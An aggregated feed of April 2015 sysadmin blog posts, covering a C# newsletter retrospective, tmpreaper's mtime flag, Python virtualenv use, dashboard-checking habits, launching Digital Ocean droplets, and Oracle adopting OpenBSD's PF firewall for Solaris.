I started a Google Adwords campaign for the newsletter fairly early on. The campaign was reasonably successful while it lasted. Unfortunately, the website must have tripped up some kind of filter because the campaign was stopped. Pitty because the campaign did convert quite well. I did appeal the decision and I was informed that Google didn’t like the fact that the site doesn’t have a business model and that it links out to other websites a lot. Curiously, both charges could have been levelled at Google in the early days.

The weekly newsletter itself is a lot of fun to produce. During the week I look out for interesting and educational C# related content and tweet it via the @C# Weekly twitter account. I then condense all of the twitter content into a single email once a week on a Friday. Not all of the tweeted content makes it into the weekly issue. There is often overlap between content produced during the week so I get to choose what’s best.

The job of curating does take longer than I originally anticipated. I suspect that each issue takes the better part of a day to produce, which is probably twice the time I anticipated. Perhaps, when I’m more experienced, I will be able to reduce the time taken to produce the issue without reducing the quality.

Time will tell.

I can certainly recommend curating a newsletter from the perspective of learning about the topic. Even after only eight weeks I feel like I have learned quite a lot about C# that I wouldn’t otherwise have known, especially about the upcoming C# version 6.

If you want to learn about a topic, I can certainly recommend curating a newsletter as a good learning tool.

One of my better ideas over the last year was to move over to Curated, a newsletter service provider founded by the folks who run the very successful iOS Dev Weekly newsletter. The tools provided by Curated have helped a lot.

C# Weekly Content Interaction Stats Chart

C# Weekly Content Interaction Statistics

One of the best features of Curated is the statistics it provides for each issue. You can learn a lot from discovering which content subscribers are most interested in. You won’t be surprised to find that the low level C# content is the most popular.

The only minor problem I’ve found is that my dog eared old site actually converted subscribers at a higher rate than my current site. The version 1 site was converting at around 18% whereas the current site is converting at around 13%.

I have a few ideas around why the conversion rate has dropped. The current site is a bit drab and needs to be spruced up a little bit. In addition, the current site displays previous issues, including the most recent issue on the home page. I wonder if having content on the home page actually distracts people from subscribing.

All told curating a newsletter is fun. I can thoroughly recommend it. :)

by Jack Hughes at April 23, 2015 03:10 PM

April 20, 2015


Why Isn't tmpreaper Working?

If you have a directory that you want to keep clean, tmpreaper is a great way to remove files based on how old they are. The other day, I had a directory that looked like this:

x@x:~/dump$ ls -l
-rw-r--r-- 1 x x 212268169 Mar 15 01:02 x-2015-03-15.sql.gz
-rw-r--r-- 1 x x 212270156 Mar 16 01:02 x-2015-03-16.sql.gz
-rw-r--r-- 1 x x 212276275 Mar 17 01:02 x-2015-03-17.sql.gz
-rw-r--r-- 1 x x 212308369 Mar 18 01:02 x-2015-03-18.sql.gz
-rw-r--r-- 1 x x 212315343 Mar 19 01:02 x-2015-03-19.sql.gz
-rw-r--r-- 1 x x 212324575 Mar 20 01:02 x-2015-03-20.sql.gz
-rw-r--r-- 1 x x 212341738 Mar 21 01:02 x-2015-03-21.sql.gz
-rw-r--r-- 1 x x 212375590 Mar 22 01:02 x-2015-03-22.sql.gz
-rw-r--r-- 1 x x 212392563 Mar 23 01:02 x-2015-03-23.sql.gz

I decided that I didn't need those SQL dumps older than 30 days, so I would use tmpreaper to clean them. The proper command is

tmpreaper +30d /home/x/dump

I added the --test flag just to make sure my command would work. But, alas! Nothing happened:

x@x:~/dump$ tmpreaper --test +30d /home/x/dump
(PID 4057) Pretending to clean up directory `/home/x/dump'.

That's when I realized that this is the directory that I had recently recompressed all the files using gzip -9 to get better compression. Although ls was reporting the time the original files were created, this is not the time tmpreaper was looking at. You can see what I mean if you use ls -lc:

x@x:~/dump$ ls -lc
total 7863644
-rw-r--r-- 1 x x 212268169 Apr 11 03:03 x-2015-03-15.sql.gz
-rw-r--r-- 1 x x 212270156 Apr 11 03:06 x-2015-03-16.sql.gz
-rw-r--r-- 1 x x 212276275 Apr 11 03:09 x-2015-03-17.sql.gz
-rw-r--r-- 1 x x 212308369 Apr 11 03:12 x-2015-03-18.sql.gz
-rw-r--r-- 1 x x 212315343 Apr 11 03:15 x-2015-03-19.sql.gz
-rw-r--r-- 1 x x 212324575 Apr 11 03:17 x-2015-03-20.sql.gz
-rw-r--r-- 1 x x 212341738 Apr 11 03:20 x-2015-03-21.sql.gz
-rw-r--r-- 1 x x 212375590 Apr 11 03:23 x-2015-03-22.sql.gz
-rw-r--r-- 1 x x 212392563 Apr 11 03:26 x-2015-03-23.sql.gz

In order to have tmpreaper look at the proper timestamp, use the --mtime flag:

x@x:~/dump$ tmpreaper --mtime --test +30d /home/x/dump
(PID 4362) Pretending to clean up directory `/home/x/dump'.
Pretending to remove file `/home/x/dump/x-2015-03-20.sql.gz'.
Pretending to remove file `/home/x/dump/x-2015-03-17.sql.gz'.
Pretending to remove file `/home/x/dump/x-2015-03-21.sql.gz'.
Pretending to remove file `/home/x/dump/x-2015-03-15.sql.gz'.
Pretending to remove file `/home/x/dump/x-2015-03-22.sql.gz'.
Pretending to remove file `/home/x/dump/x-2015-03-18.sql.gz'.
Pretending to remove file `/home/x/dump/x-2015-03-19.sql.gz'.
Pretending to remove file `/home/x/dump/x-2015-03-16.sql.gz'.

by Scott Hebert at April 20, 2015 04:12 PM

Standalone Sysadmin

Reminder (to self, too): Use Python virtualenv!

I’m really not much of a programmer, but I dabble at times, in order to make tools for myself and my colleagues. Or toys, like the time I wrote an entire MBTA library because I wanted to build a Slack integration for the local train service.

One of the things that I want to learn better, because it seems so gosh-darned helpful, is Python. I’m completely fluent (though non-expert level) in both Bash and PHP, so I’m decent at writing systems scripts and web back-ends, but I’m only passingly familiar with Perl. The way I see it, the two “modern” languages that get the most use in systems scripts are Python and Ruby, and it’s basically a toss-up for me as to which to pick.

Python seems a little more pervasive, although ruby has the benefit of basically being the language of our systems stack. Puppet, Foreman, logstash, and several other tools are all written in Ruby, and there’s a lot to be said for being fluent in the language of your tools. That being said, I’m going to learn Python because it seems easier and honestly, flying sounds so cool.


One of the things that a lot of intro-to-Python tutorials don’t give you is the concept of virtual environments. These are actually pretty important in a lot of ways. You don’t absolutely need them, but you’re going to make your life a lot better if you use them. There’s a really great bit on why you should use them on the Python Guide, but basically, they create an entire custom python environment for your code, segregated away from the rest of the OS. You can use a specific version of python, a specific set of modules, and so on (with no need for root access, since they’re being installed locally).

Installing virtualenv is pretty easy. You may be able to install it with your system’s package manager, or you may need to use pip. Or you could use easy_install. Python, all by itself, has several package managers. Because of course it does.

Setting up a virtual environment is straight forward, if a little kudgy-feeling. If you find that you’re going to be moving it around, maybe from machine to machine or whatever, you should probably know about the —relocatable flag.

By default, the workflow is basically, create a virtual environment, “activate” the virtual environment (which mangles lots of environmental variables and paths, so that python-specific stuff runs local to the environment rather than across the entire server), configuring it by installing the modules you need, write/execute your code as normal, and then deactivate your environment when you’re done, which restores all of your original environmental settings.

There is also a piece of software called virtualenvwrapper that is supposed to make all of this easier. I haven’t used it, but it looks interesting. If you find yourself really offended by the aforementioned workflow, give it a shot and let me know what you think.

Also as a reminder, make sure to put your virtual environment directory in your .gitignore file, because you’re definitely using version control, right? (Right?) Right.

Here’s how I use virtual environments in my workflow:

msimmons@bullpup:~/tmp > mkdir mycode
msimmons@bullpup:~/tmp > cd mycode
msimmons@bullpup:~/tmp/mycode > git init
Initialized empty Git repository in /home/msimmons/tmp/mycode/.git/
msimmons@bullpup:~/tmp/mycode > virtualenv env
New python executable in env/bin/python
Installing setuptools, pip...done.
msimmons@bullpup:~/tmp/mycode > echo "env" > .gitignore
msimmons@bullpup:~/tmp/mycode > git add .gitignore # I always forget this!
msimmons@bullpup:~/tmp/mycode > source env/bin/activate
(env)msimmons@bullpup:~/tmp/mycode >
(env)msimmons@bullpup:~/tmp/mycode > which python
(env)msimmons@bullpup:~/tmp/mycode > deactivate
msimmons@bullpup:~/tmp/mycode > which python

by Matt Simmons at April 20, 2015 01:15 PM

April 18, 2015

The Lone Sysadmin

When Should I Upgrade to VMware vSphere 6?

I’ve been asked a few times about when I’m planning to upgrade to VMware vSphere 6. Truth is, I don’t know. A Magic 8 Ball would say “reply hazy, try again.” Some people say that you should wait until the first major update, like the first update pack or first service pack. I’ve always thought […]

The post When Should I Upgrade to VMware vSphere 6? appeared first on The Lone Sysadmin. Head over to the source to read the full post!

by Bob Plankers at April 18, 2015 05:38 AM

April 17, 2015

Sean's IT Blog

Looking Ahead To the Future

“You might feel that somehow, you’ve lost all your fizz.
Or you’re frazzled like a…um…frazzled thing.  I’m not sure what it is.”
From Happy Hippo, Angry Duck by Sandra Boynton

For the last year and a half, I’ve worked for Faith Technologies, a large electrical contractor with offices in five states, in Menasha, WI.  I have a great manager who has encouraged me to grow and get involved in the greater IT community.  That manager has also lead one of the best teams I’ve worked on to-date.

While I have learned and accomplished a great deal in this role, it is time to move on.  Today is my last day with Faith.

While Faith is a great company, and I have a great manager and work on a great team, I didn’t see a path forward to reach goals that I had set for myself. 

I will be starting a new role next week Tuesday.  My new role is a big change for me as I will be moving from the customer side over to a partner. I’ll be going to work with another awesome team, and I’m looking forward to the challenges that this new role will bring.

by seanpmassey at April 17, 2015 01:34 PM

April 16, 2015

The Tech Teapot

The evils of the dashboard merry-go-round

What is the first thing you do when you get to the office? Check your email probably. Then what? I bet you go through the same routine of checking your dashboards to see what’s happened overnight.

That is exactly what I do every single morning at work.

And I keep checking those dashboards throughout the day. Sometimes I manage to get myself in a loop, continuing around and around the same set of dashboards.

I can pretty much guarantee that nothing will have changed significantly. Certainly not to the point where some action is necessary.

How many times do you check some dashboard and then action something? Me? Very rarely, if ever.

The Problem

I call this obsessive need to view all of my various dashboards my dashboard merry-go-round.

The merry-go-round is particularly a problem with real time stats. When Google Analytics implemented real time stats I guarantee that webmaster productivity plumeted the very next day.

But the merry-go-round is not confined to Google Analytics or even website statistics. Any kind of statistics will do.

It is a miracle I manage to do any work. One of the most seductive things about the constant dashboard merry-go-round is that it feels like work. There you are frantically pounding away quickly moving between your various dashboards. It even looks to everybody else like work. Your boss probably thinks you’re being really productive.

The problem is that there is no action. There is no end result.

You log into Google Analytics, go to the “Real-Time” section, you discover that there are five people browsing your site. On pages X, Y, and Z.

So what. You are not getting any actionable information from this.

You then go to the other three sites you’ve got in Google Analytics. Rince and reapeat.


The obvious solution is to just stop. But if it was as simple as that, you’d already have stopped and so would I.


One of the things you are trying to do by going into your dashboards is to see what’s changed. Has anything interesting happened? One way you can short circuit this is to configure the dashboard to tell you when something interesting has happened.

I use the Pingdom service to monitor company websites and I almost never go into the Pingdom dashboard. Why? Because I’ve configured the service to send me a text message to my mobile whenever a website goes down. If I don’t receive a text, then there’s no need to look at the dashboard.

Notifications do come with a pretty big caveat: you must trust your notifications. If I can’t rely on Pingdom to tell me when my sites are down, I may be tempted to go dashboard hunting.

Even if your systems are only capable of sending email alerts, you can still turn those into mobile friendly notifications and even phone call alerts using services like PagerDuty, OpsGenie and Victorops.

Instead of needing a mobile phone app for each service you run, you can merge all of your alerts into a single app with mobile notifications.

If you haven’t received a notification, then you don’t need to go anywhere near the dashboard. Every time you think about going there just remind yourself that, if there was a problem, you’d already know about it.

Time Management Techniques

Pomodoro Technique or Timeboxing or … lots of other similar techniques.

None of the time management techniques will of themselves cure your statsitus, it just moves it into your own “pomodori“, or, the time in between your productive tasks. If you want to sacrifice your own leisure time to stats, then go nuts. But at least you’re getting work done in the mean time.

The Writers’ Den

One technique writers use to be more productive is the writer’s den. The idea is you set aside a space with as few distractions as possible, including a PC with just the software you need to work and that isn’t connected to the internet.

Not a bad idea, but unfortunately, a lot of us can’t simply switch the internet off. We either work directly with internet connected applications or we need to use reference materials only available on the web.

As ever, there are software solutions that can restrict access to sites at pre-defined times of the day. You could permit yourself free access for the first half hour of work, and then again just before you leave. Leaving a large chunk of your day for productive work.

The drawback with systems that restrict access is that, as you are likely to be the person setting up the system, you’re also likely to be able to circumvent it quite easily too.


For me, dashboards and stats can be both a boon and a curse at the same time. They can hint at problems and actions you need to take, but they can also suck an awful lot of time out of your day.

I’ve found that a combination of time management and really good notifications are a great way to stop the dashboard merry-go-round and put stats into their rightful place. A tool to help you improve, not an end in themselves.

The problem with concentrating too much on statistics is that it is so seductive. It feels like you are working hard but, in the end, if there are no actions coming out of the constant stats watching, then it is all wasted effort.

If you have any hints and tips how you overcame your dashboard merry-go-round, please leave a comment. :)

[Picture is of a French old-fashioned style carousel with stairs in La Rochelle by Jebulon (Own work) [GFDL ( or CC BY-SA 3.0 (], via Wikimedia Commons]

by Jack Hughes at April 16, 2015 03:26 PM

April 15, 2015

Standalone Sysadmin

Spinning up a quick cloud instance with Digital Ocean

This is another in a short series of blog posts that will be brought together like Voltron to make something even cooler, but it’s useful on its own. 

I’ve written about using a couple other cloud providers before, like AWS and the HP cloud, but I haven’t actually mentioned Digital Ocean yet, which is strange, because they’ve been my go-to cloud provider for the past year or so. As you can see on their technology page, all of their instances are SSD backed, they’re virtualized with KVM, they’ve got IPv6 support, and there’s an API for when you need to automate instance creation.

To be honest, I’m not automating any of it. What I use it for is one-off tests. Spinning up a new “droplet” takes less than a minute, and unlike AWS, where there are a ton of choices, I click about three buttons and get a usable machine for whatever I’m doing.

To get the most out of it, the first step you need to do is to generate an SSH key if you don’t have one already. If you don’t set up key-based authentication, you’ll get the root password for your instance in your email, but ain’t nobody got time for that, so create the key using ssh-keygen (or if you’re on Windows, I conveniently covered setting up key-based authentication using pageant the other day – it’s almost like I’d planned this out).

Next, sign up for Digital Ocean. You can do this at or you can get $10 for free by using my referral link (and I’ll get $25 in credit eventually).  Once you’re logged in, you can create a droplet by clicking the big friendly button:

This takes you to a relatively limited number of options – but limited in this case isn’t bad. It means you can spin up what you want without fussing about most of the details. You’ll be asked for your droplet’s hostname (which will be used to refer to the instance both in the Digital Ocean interface and will actually be set to to the hostname of the created machine),  you’ll need to specify the size of the machine you want (and at the current moment, here are the prices:)

The $10/mo option is conveniently highlighted, but honestly, most of my test stuff runs perfectly fine on the $5/mo, and most of my test stuff never runs for more than an hour, and 7/1000 of a dollar seems like a good deal to me. Even if you screw up and forget about it, it’s $5/mo. Just don’t set up a 64GB monster and leave that bad boy running.

Next there are several regions. For me, New York 3 is automatically selected, but I can override that default choice if I want. I just leave it, because I don’t care. You might care, especially if you’re going to be providing a service to someone in Europe or Asia.

The next options are for settings like Private Networking, IPv6, backups, and user data. Keep in mind that backups cost money (duh?), so don’t enable that feature for anything you don’t want to spend 20% of your monthly fee on.

The next option is honestly why I love Digital Ocean so much. The image selection is so painless and easy that it puts AWS to shame. Here:

You can see that the choice defaults to Ubuntu current stable, but look at the other choices! Plus, see that Applications tab? Check this out:

I literally have a GitLab install running permanently in Digital Ocean, and the sum total of my efforts were 5 seconds of clicking that button, and $10/mo (it requires a gig of RAM to run the software stack). So easy.

It doesn’t matter what you pick for spinning up a test instance, so you can go with the Ubuntu default or pick CentOS, or whatever you’d like. Below that selection, you’ll see the option for adding SSH keys. By default, you won’t have any listed, but you have a link to add a key, which pops open a text box where you can paste your public key text. The key(s) that you select will be added to the root user’s ~/.ssh/authorized_keys file, so that you can connect in without knowing the password. The machine can then be configured however you want. (Alternately, when selecting which image to spin up, you can spin up a previously-saved snapshot, backup, or old droplet which can be pre-configured (by you) to do what you need).

Click Create Droplet, and around a minute later, you’ll have a new entry in your droplet list that gives you the public IP to connect to. If you spun up a vanilla OS, SSH into it as the root user with one of the keys you specified, and if you selected one of the apps from the menu, try connecting to it over HTTP or HTTPS.

That’s really about it. In an upcoming entry, we’ll be playing with a Digital Ocean droplet to do some cool stuff, but I wanted to get this out here so that you could start playing with it, if you don’t already. Make sure to remember, though, whenever you’re done with your machine, you need to destroy it, rather than just shut it down. Shutting it down makes it unavailable, but keeps the data around, and that means you’ll keep getting billed for it. Destroy it and that erases the data and removes the instance, which is what causes you to be billed.

Have fun, and let me know if you have any questions!

by Matt Simmons at April 15, 2015 01:00 PM

April 12, 2015

That grumpy BSD guy

Solaris Admins: For A Glimpse Of Your Networking Future, Install OpenBSD

Yet another proprietary tech titan turns to the free OpenBSD operating system as their source of innovation in the networking and security arena.

Roughly a week ago, on April 5th, 2015, parts of Oracle's roadmap for upcoming releases of their Solaris operating system was leaked in a message to the public OpenBSD tech developer mailing list. This is notable for several reasons, one is that Solaris, then owned and developed by (the now defunct) Sun Microsystems, was the original development platform for Darren Reed's IP Filter, more commonly known as IPF, which in turn was the software PF was designed to replace.

IPF was the original firewall in OpenBSD, and had at the time also been ported to NetBSD, FreeBSD and several other systems. However, over time IPF appears to have fallen out of favor almost everywhere, and as the (perhaps not quite intended as such) announcement has it,

IPF in Solaris is on its death row.
Which we can reasonably be taken to mean that Oracle, like the OpenBSD project back in 2001 but possibly not for the same reasons, are abandoning the legacy IP Filter code base, and moving on to something newer:

PF in 11.3 release will be available as optional firewall. We hope to make PF default (and only firewall) in Solaris 12. You've made excellent job, your PF is crystal-clear design.
Perhaps due to Oracle's practice of putting beta testers under non-disclosure agreements, or possibly because essentially no tech journalists ever read OpenBSD developer-focused mailing lists, Oracle's PF plans have not generated much attention in the press.

I personally find it quite interesting that the Oracle Solaris team are apparently taking in the PF code from OpenBSD. As far as I'm aware release dates for Solaris 11.3 and 12 have not been announced yet, but looking at the release cycle churn (check back to the Wikipedia page's Version history section), it's reasonable to assume that the first Solaris release with PF should be out some time in 2015.

The OpenBSD packet filter subsystem PF is not the first example of OpenBSD-originated software ending up in other projects or even in commercial, proprietary products.

Basically every Unix out there ships some version of OpenSSH, which is developed and maintained as part of the OpenBSD project, with a -portable flavor maintained in sync for others to use (a model that has been adopted by several other OpenBSD associated projects such as the OpenBGPD routing daemon, the OpenSMTPD mail daemon, and most recently, the LibreSSL TLS library. The portable flavors have generally seen extensive use outside the OpenBSD sphere such as Linux distributions and other Unixes.

The interesting thing this time around is that Oracle are apparently now taking their PF code directly from OpenBSD, in contrast to earlier code recipients such as Blackberry (who became PF consumers via NetBSD) and Apple, whose main interface with the world of open source appears to be the FreeBSD project, except for the time when the FreeBSD project was a little too slow in updating their PF code, ported over a fresher version and added some features under their own, non-compatible license.

Going back to the possibly unintended announcement, the fact that the Oracle developers produced a patch against OpenBSD-current, which was committed only a few days later, indicates that most likely they are working with fairly recent code and are probably following OpenBSD development closely.

If Oracle, or at least the Solaris parts of their distinctly non-diminutive organization, have started waking up to the fact that OpenBSD-originated software is high quality, secure stuff, we'll all be benefiting. Many of the world's largest corporations and government agencies are heavy Solaris users, meaning that even if you're neither an OpenBSD user or a Solaris user, your kit is likely interacting intensely with both kinds, and with Solaris moving to OpenBSD's PF for their filtering needs, we will all be benefiting even more from the OpenBSD project's emphasis on correctness, quality and security in the released OpenBSD code.

If you're a Solaris admin who's wondering what this all means to you, you can do several things to prepare for the future. One is to install OpenBSD somewhere (an LDOM in a spare corner of your T-series kit or an M-series domain will do, as will most kinds of x86ish kit) - preferably, also buying a CD set.

A second possibly smart action (and I've been dying to say this for a while to Solaris folks) is to buy The Book of PF -- recently updated to cover new features such as the traffic shaping system.

And finally, if you're based in North America (or if your boss is willing to fly you to Ottawa in June anyway), there's a BSDCan tutorial session you probably want to take a closer look at, featuring yours truly. Similar sessions elsewhere may be announced later, watch the Upcoming talks section on the upper right. If you're thinking of going to Ottawa or my other sessions, you may want to take a peek at my notes on tutorials originally for two earlier BSDCan sessions.

Update 2015-04-15: Several commenters and correspondents have asked two related questions: "Will Oracle contribute code and patches back?" and "Will Oracle donate to OpenBSD?". The answer to the first question is that it looks like they've already started. Which is of course nice. Bugfixes and well implemented feature enhancements are welcome, as long as they come under an acceptable license. The answer to the second question is, we don't know yet. It probably won't hurt if the Oracle developers themselves as well as Solaris users start pointing the powers that be at Oracle in the direction of the OpenBSD project's Donations page, which outlines several useful approaches to help financing the project.

If you find this or other articles of mine useful, irritating, enlightening or otherwise and want me and the world to know about it, please use the comments feature. Response will likely be quicker there than if you send me email.

by Peter N. M. Hansteen ( at April 12, 2015 07:53 PM